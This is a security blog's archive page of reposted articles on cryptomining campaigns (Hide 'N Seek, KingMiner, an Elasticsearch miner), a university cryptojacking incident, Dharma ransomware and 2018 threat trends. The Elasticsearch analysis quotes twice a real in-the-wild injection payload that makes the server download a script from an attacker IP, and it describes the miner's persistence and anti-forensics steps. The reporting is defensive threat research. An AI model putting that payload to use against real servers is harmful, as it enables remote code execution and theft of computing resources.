Category Archives: cryptocurrency miner

Hide ‘N Seek Botnet Continues to Grow by Infecting IoT Devices Using Default Credentials

Avast security analysts reported that the Hide ‘N Seek botnet continues to grow by infecting vulnerable Internet of Things (IoT) devices still using their default passwords.

According to Avast, the Hide ‘N Seek botnet comes with two main functionalities. The first capability involves the use of a scanner borrowed from Mirai malware to reach random IP addresses of IoT devices and abuse well-known exploits. If this doesn’t work, the scanner attempts to brute-force access to an IoT device using a hard-coded list of default passwords.

For its second functionality, the IoT botnet uses a peer-to-peer (P2P) protocol to share information about new peers, exfiltrate files from an infected device and distribute new binaries, including some for a Monero cryptocurrency miner. Avast’s researchers believe the Monero miner was just a test and that the attackers’ true intentions are still unknown.

A Busy Year for Hide ‘N Seek

Bitdefender researchers were the first to spot the Hide ‘N Seek botnet in January 2018. A few months later, Bitdefender reported the threat had added code that abused two new vulnerabilities affecting Internet Protocol television (IPTV) camera models to scan for a larger pool of vulnerable devices and to achieve persistence on an infected IoT product.

More improvements followed in July, when 360 Netlab observed additional exploits and a then-inactive mining program. Two months later, Bitdefender discovered yet another update when Hide ‘N Seek gained the ability to exploit the Android Debug Bridge (ADB) over Wi-Fi feature in Android devices.

The botnet’s evolution is of particular concern given the overall growth in IoT threats. In just the first half of 2018, Kaspersky Lab detected 121,588 IoT malware samples — three times as many samples uncovered for all of 2017.

How to Defend Your Organization Against IoT Botnets

Security professionals can help defend against IoT botnets by changing all default passwords on their organization’s devices. Toward this end, security teams should also build an incident response team that can oversee software patches and disclose any breaches.

Sources: Avast, Bitdefender, Bitdefender (1), 360 Netlab, Bitdefender(2), Kaspersky Lab

The post Hide ‘N Seek Botnet Continues to Grow by Infecting IoT Devices Using Default Credentials appeared first on Security Intelligence.

TrendLabs Security Intelligence Blog: Cryptocurrency Miner Spreads via Old Vulnerabilities on Elasticsearch

by Jindrich Karasek and Loseway Lu

We detected mining activity on our honeypot that involves the search engine Elasticsearch, which is a Java-developed search engine based on the Lucene library and released as open-source. The attack was deployed by taking advantage of known vulnerabilities CVE-2015-1427, a vulnerability in its Groovy scripting engine that allows remote attackers to execute arbitrary shell commands through a crafted script, and CVE-2014-3120, a vulnerability in the default configuration of Elasticsearch. The vulnerable versions are no longer supported by Elasticsearch.

We found a search query with the following command (also described in a blog by ISC) on a server running Elasticsearch:

“{“lupin”:{“script”: “java.lang.Math.class.forName(\”java.lang.Runtime\”).getRuntime().exec(\”wget hxxp://69[.]30[.]203[.]170/gLmwDU86r9pM3rXf/update.sh -P
/tmp/sssooo\”).getText()”}}}”

The command was run by the same system/attacking host, which also hosted the payload. At the time of writing, the IP is resolved to the domain name matrixhazel[.]com, which was inaccessible. The system was also found to have installed CentOS 6, which runs both web and SSH servers.

Figure 1. GreyNoise marked the host as a known scanner

Figure 1. GreyNoise marked the host as a known scanner

It is important to note that this kind of attack is not new, but it has recently reemerged. For instance, Trend Micro Smart Protection Network feedback in November detected the cryptocurrency miner on endpoints in several countries such as China, Taiwan, and the United States.

The miner distributes the bash script update.sh by first invoking the shell and running the download command with output set in the “/tmp/sssooo” file. “/tmp” is used because it has less restrictive permissions on most systems by default.

This attack is relatively simple, yet can have a significant impact on the victim. Once the attacker gains the ability to run arbitrary commands on the system, he can attempt to escalate the privileges or even pivot to other systems in order to compromise the network further.

It should also be noted that while the scheme of the attack is the same in most cases, the payloads might differ. In this case that we analyzed, the payload was the file update.sh. Once run, the bash script update.sh downloads two files called devtools and config.json. The script then deploys the cryptocurrency miner (detected by Trend Micro as Coinminer.Linux.MALXMR.UWEIS).

The actual file with the miner’s ELF64 binary is named devtools, which helps disguise the miner, as “devtools” is also a regular tool on GitHub. The miner uses a configuration as stated in the file config.json.

Figure 2. Details of the configuration file config.json

Figure 2. Details of the configuration file config.json

Such a scheme is already widely used, but the wrapper bash script has several other interesting functions. The coding style is very similar to hacking tools, and parts of the code were also spotted in an Xbash-related case before.

How the cryptocurrency miner is deployed

The miner consists of three files, downloaded through either wget, curl, or url commands in bash:

Figure 3. wget, curl, and url commands

Figure 3. wget, curl, and url commands

The miner is capable of downloading the following:

  • Devtools – The actual miner;
  • Update.sh – The bash script used to download all the parts (The script is also run during the attack.);
  • Config.json – The configuration file for the miner.

First, it attempts to save the files into the “/etc/” directory, and tries the “/tmp” in case it fails. The latter was the success in our case. After that, it checks for other ongoing mining activity in the machine. It assumes the device has already been attacked, and hijacks the machine from its previous attacker. This process may also be used to update the running miner to a newer version.

Figure 4. Sample of commands that allow the miner to eliminate other existing miners

Figure 4. Sample of commands that allow the miner to eliminate other existing miners

If it detects other miners in the system, the running processes related to the miners will be killed. It also resets the crontab so cron won’t start other miners again.

Figure 5. Processes of other miners found in the system will be killed

Figure 5. Processes of other miners found in the system will be killed

The miner adds itself to the crontab so it’s run every 10 minutes. At the beginning of each run, it unlocks itself with “chattr -i“ and updates its files, while at the end of each run it protects the files with “chattr +i” which serves to prevent the file from modification or removal by other low privilege users. It also cleans its tracks by emptying the history logs (as seen in Figure 8). One interesting point is when the script is running in the root directory, the script tries to add its own SSH key to the authorized_keys, which allows it to login without a password. Somehow the command order looks buggy, causing the removal of authorized_keys right after the key is added.

Figure 6. Other miner capabilities: components protection, persistence via crontab, and network traffic encryption

Figure 6. Other miner capabilities: components protection, persistence via crontab, and network traffic encryption

Figure 7. Miner modifies the iptables/firewall in the system

Figure 7. Miner modifies the iptables/firewall in the system

Figure 8. Miner cleans its track by removing the history and emptying files

Figure 8. Miner cleans its track by removing the history and emptying files

Conclusion and Recommendations

To prevent attacks that exploit known vulnerabilities in Elasticsearch, it is necessary to patch systems regularly and have security monitoring in place with custom rules, which allows for the detection of basic events as well as complex alerts.

There are variations to the command injected in Elasticsearch as spotted in the wild, but they have these factors in common:

  • They all invoke shell to run a command;
  • They all contain a command to download a file from remote/local locations, like curl, wget, url, ftp/get, and so on;
  • They download the file into either “/etc” or “/tmp”;
  • They are usually tried in sequence as the host tries to use all combinations of download file locations and commands to be run on local system (in order to download the malicious file).

Detection of related attacks is crucial and should be done through these measures:

  • Log Elasticsearch usage and monitor for strings that may suggest command injection.
  • Monitor the system’s behavior. Shell should only be used by authorized users and solutions.
  • Classify network traffic through correlation. In our case, malicious IP would be regularly called every 10 minutes. This should be easy to spot with the right network monitoring process and traffic analysis in place.

Users can consider adopting security solutions that can defend against cryptocurrency-mining malware through a cross-generational blend of threat defense techniques. Trend Micro™ XGen™ security provides high-fidelity machine learning that can secure the gateway and endpoints, and protect physical, virtual, and cloud workloads. With technologies that employ web/URL filtering, behavioral analysis, and custom sandboxing, XGen security offers protection against ever-changing threats that bypass traditional controls and exploit known and unknown vulnerabilities. XGen security also powers Trend Micro’s suite of security solutions: Hybrid Cloud Security, User Protection, and Network Defense.

Indicators of Compromise (IoCs)

Related hashes (SHA-256)
191f1126f42b1b94ec248a7bbb60b354f2066b45287cd1bdb23bd39da7002a8c devtools Coinminer.Linux.MALXMR.UWEIS
d3e1231d1429dccb47caf0c1c46d2eb24afe33887b31a818b8f07f0406db2637 update.sh Coinminer.SH.MALXMR.ATNL

69.30.211.82 – attacker
69.30.203.170

Command used in Elasticsearch:

“{“lupin”:{“script”: “java.lang.Math.class.forName(\”java.lang.Runtime\”).getRuntime().exec(\”wget hxxp://69[.]30[.]203[.]170/gLmwDU86r9pM3rXf/update.sh -P /tmp/sssooo\”).getText()”}}}”

Spoofed Elasticsearch version number: 1.4.1

The post Cryptocurrency Miner Spreads via Old Vulnerabilities on Elasticsearch appeared first on .



TrendLabs Security Intelligence Blog

KingMiner Maxes Out Windows Server CPUs in Widespread Cryptomining Campaign

Researchers spotted a new cryptomining threat conducting brute-force attacks using 100 percent of Internet Information Services IIS/Structured Query Language (SQL) Microsoft Windows servers’ compute resources.

The malware, called KingMiner, is designed not to steal information but to harvest cryptocurrencies such as Monero, which require considerable processing power to crunch through the mathematical calculations behind them, according to researchers at Check Point.

KingMiner was first discovered this past June, but it has since spawned a new variant with even stronger cryptomining features that is now active in the wild.

Cryptomining Campaign Drains CPUs

Once it identifies its target, KingMiner attempts to guess the system’s password, then downloads and executes a Windows scriptlet file. In some cases, the malware is already active on the system, in which case the new version kills off its predecessor. Israel, Norway, Mexico and India are among the locations where the cryptomining campaign has successfully infected Windows machines, according to the researchers.

KingMiner uses a file called XMRig to mine Monero. Although it was designed to use up only 75 percent of a victim’s machine, in practice, it drains the entire capacity of the central processing unit (CPU) due to coding errors.

The cybercriminals behind KingMiner also take pains to avoid detection. By avoiding any public mining pools with its cryptocurrency wallet and turning off the application programming interface (API), for instance, it’s difficult to know how much Monero it has harvested so far. Emulation attempts, meanwhile, are bypassed through an XML file that has been disguised as a ZIP file within the payload. Additional evasion techniques include exporting functions and adding content to the executable’s dynamic link library (DLL) files.

How to Keep Cryptomining Malware at Bay

The researchers noted that KingMiner is likely to continue its evolution based on placeholders they found in the code for future updates and versions.

Cybercriminals are increasingly interested in mining cryptocurrency it requires less social engineering and malware can run quietly in the background. Eliminating threats such as KingMiner depends on widespread adoption of security information and event management (SIEM) technology and improved network endpoint protection.

Source: Check Point

The post KingMiner Maxes Out Windows Server CPUs in Widespread Cryptomining Campaign appeared first on Security Intelligence.

Canadian University Shuts Down Network in Response to Cryptocurrency Mining Attack

St. Francis Xavier University had to take its critical IT systems offline after it discovered a scheme to mine cryptocurrency using its network resources.

On Nov. 9, the school’s IT team identified an automated attack launched by unknown threat actors in an effort to steal computing power to mine cryptocurrency, otherwise known as cryptojacking.

After consulting with security specialists, the university, which is based in Nova Scotia, made the decision to disable all network systems. Representatives of the school announced plans to reinstate the offline servers across its network in stages to reduce potential security risks.

Why Did the University Shut Down Its Network?

So far, the university has reported no evidence that the personal information of students, faculty or other parties has been leaked or stolen as part of the attack. To be safe, however, administrators reset the passwords for all university accounts across campus. The IT team said it would continue to look for anomalous behavior over the next month.

The university’s swift response affected basic access to network resources such as Wi-Fi and educational software application Moodle. Meanwhile, student payment cards and debit transactions were temporarily inoperable. The school said it plans to publish a list of which services have been restored and which are still in the queue, such as its MesAmis reporting system and Banner database. The researchers did not explain exactly how the malware was installed on the system.

How to Keep Cryptocurrency Mining Threats at Bay

The St. Francis Xavier University incident is an increasingly rare example of cryptojackers focusing on bitcoin. According to security experts, general-purpose computers are not ideal for bitcoin given the sophisticated nature of its algorithm. Instead, attacks more often exploit IT resources to mine for newer cryptocurrencies such as Monero and Ethereum.

Regardless of what’s being mined, organizations that invest in security information and event management (SIEM) are better positioned to identify cryptojacking before it’s too late to remediate the threat without halting the entire network.

Sources: St. Francis Xavier, ZDNet

The post Canadian University Shuts Down Network in Response to Cryptocurrency Mining Attack appeared first on Security Intelligence.

New Ransomware Strain Evades Detection by All but One Antivirus Engine

Researchers discovered a new strain of Dharma ransomware that is able to evade detection by nearly all of the antivirus solutions on the market.

In October and November 2018, researchers with Heimdal Security uncovered four strains of Dharma, one of the oldest ransomware families in existence. One of the strains slid past a total of 53 antivirus engines listed on VirusTotal and 14 engines used by the Jotti malware scan. Just one of the security scanners included in each of those utilities picked up on the strain’s malicious behavior.

In its analysis of the strain, Heimdal observed a malicious executable dropped through a .NET file and another associated HTML Application (HTA) file that, when unpacked, directed victims to pay a ransom amount in bitcoin.

How Persistent Is the Threat of Ransomware?

The emergence of the new Dharma strain highlights ransomware’s ongoing relevance as a cyberthreat. Europol declared that it remains the key malware threat in both law enforcement and industry reporting. The agency attributed this proclamation to financially motivated malware attacks increasingly using ransomware over banking Trojans, a trend that it anticipates will continue for years to come.

Europol identified this tendency despite a surge in activity from other threats. For example, Comodo Cybersecurity found that crypto-mining malware rose to the top of detected malware incidents in the first three months of 2018. In so doing, malicious cryptominers supplanted ransomware as the No. 1 digital threat for that quarter, according to Comodo research.

Defend Against New Malware Strains With Strong Endpoint Security

Security professionals can help keep ransomware off their networks by using an endpoint management solution that provides real-time visibility into their endpoints. Experts also recommend using tools that integrate with security information and event management (SIEM) software to streamline responses to potential incidents.

Sources: Heimdal Security, Europol, Comodo Cybersecurity

The post New Ransomware Strain Evades Detection by All but One Antivirus Engine appeared first on Security Intelligence.

Which Threats had the Most Impact During the First Half of 2018?

One of the best ways for organizations to shore up their data security efforts and work toward more proactive protection is by examining trends within the threat environment.

Taking a look at the strategies for attack, infiltration and infection currently being utilized by hackers can point toward the types of security issues that will continue in the future and enable enterprises to be more prepared with the right data and asset safeguarding measures.

Each year brings both continuing and emerging threats which can complicate security efforts. Awareness of the most impactful threats – including those that might have been popular in the past, as well as the new approaches spreading among cybercriminals – is crucial in the data security landscape.

Recently, Trend Micro researchers examined the data protection and cyberthreat issues prevalent during the first half of 2018 and included these findings in the 2018 Midyear Security Roundup: Unseen Threats, Imminent Losses report.

Let’s take a closer look at this research, as well as top identified threats that impacted businesses during the first six months of this year.

Widespread vulnerabilities and software patching

Back in 2014, the world was introduced to Heartbleed. At the time, it was one of the largest and most extensive software vulnerabilities, impacting platforms and websites leveraging the popular OpenSSL cryptographic software library. The bug made global news because of the vast number of websites it affected, as well as the fact that it enabled malicious actors to access, read and potentially leak data stored in systems’ memory.

Since then, a few additional vulnerabilities have been identified, including two at the beginning of 2018. Design flaws within microprocessing systems – since dubbed Meltdown and Spectre – were identified by researchers. Unfortunately, though, these weren’t the only high-profile vulnerabilities to make headlines this year.

As Trend Micro reported in May, eight other vulnerabilities were uncovered following Meltdown and Spectre, which also impacted Intel processors, including four that were considered “high” severity threats. Because these processors are used by a considerable number of devices within businesses and consumer environments across the globe, the emerging vulnerabilities were significantly worrisome for security admins and individual users alike.

Vulnerabilities that affect such large numbers of devices and users can be a significant challenge for enterprise security postures. Taking a cue from Heartbleed, the Register reported that despite the fact that a patch was released several years earlier, an estimated 200,000 systems were still vulnerable to the bug in early 2017.

Installing software updates in a timely manner is a top facet of patching best practices.

Spectre, Meltdown and the series of other identified vulnerabilities showcase the key importance of proper patching. Even Intel worked to drive this point home in a released statement encouraging users to maintain a beneficial patching strategy.

“We believe strongly in the value of coordinated disclosure and will share additional details on any potential issues as we finalize mitigations,” Intel noted, according to TechSpot. “As a best practice, we continue to encourage everyone to keep their systems up-to-date.”

The mere presence of an identified vulnerability can create security weaknesses, but an unpatched system can boost the chances of an attack or breach incident even further. It’s imperative that, in light of these widespread vulnerabilities, enterprises ensure their patching processes are comprehensive and proactive.

Cryptocurrency mining steals valuable resources

Researchers also noted that while cryptocurrency mining activity became more prevalent in 2017, this trend continued into the first half of 2018. Cryptocurrency mining programs can be more of an issue than many users might realize, as such a malicious initiative can rob enterprise infrastructures of key computing resources required to maintain top performance of their critical systems and applications, not to mention result in increased utility costs.

During the first six months of 2018, researchers recorded a more than 140 increase in cryptocurrency mining activity through Trend Micro’s Smart Protection Network Infrastructure. What’s more, 47 new miner malware families were identified during Q1 and Q2, demonstrating that cryptocurrency mining will continue to be a top initiative for hackers.

“Unwanted cryptocurrency miners on a network can slow down performance, gradually wear down hardware, and consume power – problems that are amplified in enterprise environments,” Trend Micro researchers stated in the Unseen Threats, Imminent Losses report. “IT admins have to keep an eye out for unusual network activity considering the stealthy but significant impact cryptocurrency mining can have on a system.”

Ransomware: No end in sight

For years, ransomware infections have been a formidable threat to organizations within every industry, and the first half of 2018 saw no change in this trend. Researchers again identified an increase in ransomware infection activity – 3 percent. While this may seem small, the current rate at which ransomware attacks take place make this rise significant.

At the same time, Trend Micro discovered a 26 percent decrease in new ransomware families. This means that while hackers are continuing to leverage this attack style to extort money from victims, they are utilizing existing, standby ransomware samples, creating fewer opportunities for zero-day ransomware threats.

Data breaches remain a constant issue for businesses of all shapes and sizes.

Mega breaches: An increasingly frequent issue

As the sophistication and potential severity of hacker activity continue to rise, so too do the consequences of successful attacks.

According to data from the Privacy Rights Clearinghouse, there was a 16 percent increase in data breaches reported in the U.S. during the first half of 2018, including 259 incidents overall. Fifteen of these events were considered “mega breaches,” or those that exposed 1 million records or more over the course of the breach and subsequent fallout.

Such incidents surpass traditional breaches in widespread effects on the victim company, its users and customers and the industry sector at large. Most of these mega breaches (71 percent) took place within the healthcare industry, and when one considers the significant amount of sensitive data healthcare institutions deal with, such threat environment conditions aren’t that surprising.

It’s also important to consider not only the traditional impact of regular and mega breaches – including losses related to company reputation and image, revenue, customer acquisition and retention and more – but the compliance costs that can emerge as well. This is an especially imperative consideration in the age of the EU’s General Data Protection Regulation, which became enforceable in May.

“This regulation … sets a high bar for data security and privacy protection,” Trend Micro’s report stated. “It imposes considerable fines for noncompliant organizations … Moreover, it has quite a long reach since any organization holding EU citizens’ data is affected.”

Check out Trend Micro’s GDPR Resource Center to learn more about maintaining compliance with this standard.

Read Trend Micro’s Unseen Threats, Imminent Losses report for more information about the top threats identified during the first half of this year.

The post Which Threats had the Most Impact During the First Half of 2018? appeared first on .